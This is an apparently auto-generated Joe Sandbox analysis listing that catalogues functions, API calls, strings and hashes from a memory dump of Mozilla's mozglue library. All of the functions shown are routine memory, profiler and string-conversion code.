Instruction ID: 459f0fd4a4a66739e37c8cabdbcb6ba89a30ff0b0ab2fcd7613e6487ad16bf57
Opcode Fuzzy Hash: 1d8ff4555fb2de4eb0823e5bbfd47431e900a1f0523c5d3d432b7bdd1a036a12
Instruction Fuzzy Hash: 825190B0E042068FDF14CF58D8C2A6EB7B9FF94308F54496EC85A9B201EB71E565CB91

Function 6664A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6664A565

Part of subcall function 6664A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6664A4BE
Part of subcall function 6664A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6664A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6664A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6664A6B6

Strings

0, xrefs: 6664A5FB
z, xrefs: 6664A6AE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 7638bc21c6dc7aebb50c4e333bace5a93506bc62c2411abfa0e407870224f556
Instruction ID: 2b730a28bc22f7cc0d6f84a553f1f753015ef5b60a1d0245d4bbc5853088af3b
Opcode Fuzzy Hash: 7638bc21c6dc7aebb50c4e333bace5a93506bc62c2411abfa0e407870224f556
Instruction Fuzzy Hash: 77414B71908745AFC341EF28D480A8FBBE5BFC9354F408A2EF49987294EB30D549CB82

Function 665D78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6665008B), ref: 665D7B89
free.MOZGLUE(?,6665008B), ref: 665D7BAC

Part of subcall function 665D78C0: free.MOZGLUE(?,6665008B), ref: 665D7BCF

free.MOZGLUE(?,6665008B), ref: 665D7BF2

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 041f9d442a0559115a93f1403a64ef397c6fee264409ccc516429961420fe4df
Instruction ID: 3642b10e44b6567da77156d37651504214344c9727509f4a9d4dfaafcba514ee
Opcode Fuzzy Hash: 041f9d442a0559115a93f1403a64ef397c6fee264409ccc516429961420fe4df
Instruction Fuzzy Hash: 7BC18371E001288BEB24DB2CCC92B9DB772AF81314F1446A9D51AA73C1D731BE85CF99

Function 66619420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
__Init_thread_footer.LIBCMT ref: 6661949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 66619459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6661947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6661946B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 2d9eafe591d5b724fbf1807a9f0bf0e185ac5ca9fe210dc0c7bd7f8d2e36bb0c
Instruction ID: e51404f4d00c480d24b3be16c5d0422202e2399a399998bd0fe9e67f0c3af05c
Opcode Fuzzy Hash: 2d9eafe591d5b724fbf1807a9f0bf0e185ac5ca9fe210dc0c7bd7f8d2e36bb0c
Instruction Fuzzy Hash: A401B57090411187D700CB5DFE13A5A72679B8532DF014137DA1BC6252D732E861899A

Function 66621220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 66621268
GetCurrentThreadId.KERNEL32 ref: 666212DA
InitializeConditionVariable.KERNEL32(?), ref: 6662134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6662138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 66621431

Part of subcall function 66618AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618BD5

free.MOZGLUE(?), ref: 6662145A
free.MOZGLUE(?), ref: 6662146C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 9607baf154d7d3b75b94bb2a8b4403c89f0e6a8899aa569da35a542c4d4b3abd
Instruction ID: 1a284732fcb37bf693155929c0b4821e8f0a6122fef8282716632ae39ff468c3
Opcode Fuzzy Hash: 9607baf154d7d3b75b94bb2a8b4403c89f0e6a8899aa569da35a542c4d4b3abd
Instruction Fuzzy Hash: 9361D5759083449BDB10CF25E880B9ABBFABFD5308F04891DEA9957212DB31E995CF81

Function 66620F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 66620F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 66620F88
GetCurrentThreadId.KERNEL32 ref: 66620FF7
InitializeConditionVariable.KERNEL32(?), ref: 66621067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 666210A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6662114B

Part of subcall function 66618AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,66631563), ref: 66618BD5

free.MOZGLUE(?), ref: 66621174
free.MOZGLUE(?), ref: 66621186

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 6574624108f74b084304040373fd112ec3a57ab8a174dc177f855ce5b32502e1
Instruction ID: ae69150f23d53e22d483c5c67b9c9b0f3820cd3fdfbd71c45f20560f676eb935
Opcode Fuzzy Hash: 6574624108f74b084304040373fd112ec3a57ab8a174dc177f855ce5b32502e1
Instruction Fuzzy Hash: 5161B4759043449BDB10CF25E890B9ABBFABFD9308F04891DE98957211DB31E895CF85

Function 665D4B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,665D4667,?,?,?,?,?,?,?,?,66614843,?), ref: 665D4C63
free.MOZGLUE(?,?,?,665D4667,?,?,?,?,?,?,?,?,66614843,?), ref: 665D4C89
free.MOZGLUE(?,?,?,665D4667,?,?,?,?,?,?,?,?,66614843,?), ref: 665D4CAC
free.MOZGLUE(?,?,?,?,?,?,?,66614843,?), ref: 665D4CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,66614843,?), ref: 665D4CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,66614843,?), ref: 665D4D15
free.MOZGLUE(?,?,?,?,?,?,?,?,66614843,?), ref: 665D4D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,665D4667,?,?,?,?,?,?,?,?,66614843,?), ref: 665D4DD1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 5847e4c719b88831de1c0f768f686909e92ada21afa3cdc7d3f63d00845777b3
Instruction ID: 49c57ad18828d4535ef0926ee99246b151469a1096d34a9b0e7719bfb306855a
Opcode Fuzzy Hash: 5847e4c719b88831de1c0f768f686909e92ada21afa3cdc7d3f63d00845777b3
Instruction Fuzzy Hash: FE518471504A408FE734DB3CD9A671A7AA2AF52329F444E1CE1A7CBBE1D335E4448B4A

Function 665DE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,665E1999), ref: 665DEA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 665DEA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 665DEA76
moz_xmalloc.MOZGLUE(-00000001,?,?,665E1999), ref: 665DEA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,665E1999), ref: 665DEAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 665DEADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 665DEB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 665DEB27

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: c6866c45aa2d8c76f2dacb937743b37411f903eeb90ba35c83cfd8ced2353a91
Instruction ID: 35780217f519917a3b11b75a15d673c0bff2dccdb60d45db114d6f6b6bdaeb00
Opcode Fuzzy Hash: c6866c45aa2d8c76f2dacb937743b37411f903eeb90ba35c83cfd8ced2353a91
Instruction Fuzzy Hash: 024192B1A002169FDB14CF6CDC86AAEBBB4BF54254F140628E825D73D4E730EA04CBE5

Function 6662D310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6662D36B
GetCurrentThreadId.KERNEL32 ref: 6662D38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D3E1
free.MOZGLUE ref: 6662D408

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

GetCurrentThreadId.KERNEL32 ref: 6662D44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6662D472

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 4bb30d09df234fcd066d7090fee08f55ca68492a8ccde0996578fea1b9c789a6
Instruction ID: 4b463c8d52762774fe378771369059fce8eb5bfce7cb9fc37232b835f458862f
Opcode Fuzzy Hash: 4bb30d09df234fcd066d7090fee08f55ca68492a8ccde0996578fea1b9c789a6
Instruction Fuzzy Hash: 0941D1759043058FCB14DF65E889AAEBBBAFFC5314F10492DEA9297340EB71A844CF91

Function 665DB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB6AC

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,665DB61E), ref: 665DB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,665DB61E,?,?,?,?,?,00000000), ref: 665DB79A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 6984e8a3058a19b69098791f43e35500771e7b15118f30b10d7ab5d510e7ece7
Instruction ID: c3393b89488da573c349dd1d0a6651afc2b9cef2cacd23b44a2c6f89852334a6
Opcode Fuzzy Hash: 6984e8a3058a19b69098791f43e35500771e7b15118f30b10d7ab5d510e7ece7
Instruction Fuzzy Hash: 2B4193F2D001159FDB04DF6CDC8266EBBB6AB95324F250669E825E7390E731ED008BD5

Function 665DEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(66655104), ref: 665DEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 665DEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 665DEFEC
free.MOZGLUE(?), ref: 665DF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 665DF02E
memcpy.VCRUNTIME140(00000000,?), ref: 665DF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 665DF065
moz_xmalloc.MOZGLUE ref: 665DF072

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 2f62193ff36cd847a3d398e80b5f81b54afcc7d1adab5603b1a51f43544ffee0
Instruction ID: 755039283b968495b8edf1fde35f4bcd3c1c260defe812806daf2b97bde687a2
Opcode Fuzzy Hash: 2f62193ff36cd847a3d398e80b5f81b54afcc7d1adab5603b1a51f43544ffee0
Instruction Fuzzy Hash: 3941D8B1E002059FCB08CF6CEC8256E7B65AF94314B244628E816DB3D4EB71ED15C7E5

Function 6664B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6664B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6664B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6664B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6664B5F4
__Init_thread_footer.LIBCMT ref: 6664B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6664B61F
std::_Facet_Register.LIBCPMT ref: 6664B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6664B655

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: cbfec5ed8606e7c6588fdf4621f3b14bed1e5378bf6fde24ebb04345c8ff1ce3
Instruction ID: e22ef9f67a5cbf5f7e2f30e2692053a218bb220fe6bce91b7c9fdee3528a4849
Opcode Fuzzy Hash: cbfec5ed8606e7c6588fdf4621f3b14bed1e5378bf6fde24ebb04345c8ff1ce3
Instruction Fuzzy Hash: 46318471A001148BCF04EF6AF85996EBBB7FFC9321B154525DA0697380DB71A812CFD5

Function 66616590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6660FA80: GetCurrentThreadId.KERNEL32 ref: 6660FA8D
Part of subcall function 6660FA80: AcquireSRWLockExclusive.KERNEL32(6665F448), ref: 6660FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 66616727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 666167C8

Part of subcall function 66624290: memcpy.VCRUNTIME140(?,?,66632003,66630AD9,?,66630AD9,00000000,?,66630AD9,?,00000004,?,66631A62,?,66632003,?), ref: 666242C4

Strings

data, xrefs: 66616593
vef, xrefs: 6661696C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vef
API String ID: 511789754-4007588540
Opcode ID: 3422655842ff0ddcbb35e86d85993131e53d208257557c306816a2763fb0484c
Instruction ID: 2b94ad8bd97093a789e04b4314622259ce692740bf0b5bb23e7cf7ff7124a556
Opcode Fuzzy Hash: 3422655842ff0ddcbb35e86d85993131e53d208257557c306816a2763fb0484c
Instruction Fuzzy Hash: E3D1C175A083409FD764DF2AE851B9FBBE6AFC5304F10892ED589C7391DB31A805CB92

Function 6660D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,665DEB57,?,?,?,?,?,?,?,?,?), ref: 6660D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,665DEB57,?), ref: 6660D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,665DEB57,?), ref: 6660D673
free.MOZGLUE(?), ref: 6660D888

Strings

W]f, xrefs: 6660D5D9, 6660D63F
|Enabled, xrefs: 6660D81E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W]f$|Enabled
API String ID: 4142949111-3091896311
Opcode ID: 7e5f5e345b89ae0c6b3dd56197eab426b16d2bfc25cd52ce490837cd58aa213c
Instruction ID: e9205b2c9438164f2a3c813726dbf42b628ffddd7354768e46aec8a6d5688835
Opcode Fuzzy Hash: 7e5f5e345b89ae0c6b3dd56197eab426b16d2bfc25cd52ce490837cd58aa213c
Instruction Fuzzy Hash: 78A111B0E003549FDB19CF69D9907AEBFF1AF89314F14816DD889AB381D731A841CBA1

Function 665E9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,66637ABE), ref: 665E985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,66637ABE), ref: 665E98A8
moz_xmalloc.MOZGLUE(00000020), ref: 665E9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 665E9918
free.MOZGLUE(?), ref: 665E9975

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 8ba6cbbfa893493d2c57fedf15ae98e0ef03a9205d43945553bd3f313e95c710
Instruction ID: 210aef66d3cb57d289e586e03a53c9d9c6976a56787b3a20e9ecc588c796bdea
Opcode Fuzzy Hash: 8ba6cbbfa893493d2c57fedf15ae98e0ef03a9205d43945553bd3f313e95c710
